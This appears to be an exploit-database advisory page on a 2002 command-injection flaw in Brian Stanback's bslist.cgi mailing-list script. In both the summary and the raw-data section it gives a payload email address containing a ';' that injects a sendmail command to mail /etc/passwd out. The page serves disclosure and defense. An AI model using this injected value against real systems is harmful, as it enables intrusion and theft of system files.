header-logo
Suggest Exploit
vendor:
bslist.cgi
by:
SecurityFocus
7.5
CVSS
HIGH
Input Validation Vulnerability
20
CWE
Product Name: bslist.cgi
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

Input Validation Vulnerability in Brian Stanback’s bslist.cgi

An input validation vulnerability exists in Brian Stanback's bslist.cgi, a script designed to coordinate mailing lists. The script fails to properly filter ';' characters from the user-supplied email addresses collected by the script. As a result, maliciously-formed values for this field can cause the the script to run arbitrary shell commands with the privilege level of the web server. This can be exploited by signing up for the mailing list with the email address of 'hacker@example.com;/usr/sbin/sendmail hacker@example.com < /etc/passwd'

Mitigation:

Input validation should be performed to ensure that user-supplied data is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/2160/info

An input validation vulnerability exists in Brian Stanback's bslist.cgi, a script designed to coordinate mailing lists.

The script fails to properly filter ';' characters from the user-supplied email addresses collected by the script.

As a result, maliciously-formed values for this field can cause the the script to run arbitrary shell commands with the privilege level of the web server. 

This can be exploited by signing up for the mailing list with the email address of

'hacker@example.com;/usr/sbin/sendmail hacker@example.com < /etc/passwd'

Navigation

Suggest Exploit

Services By CQR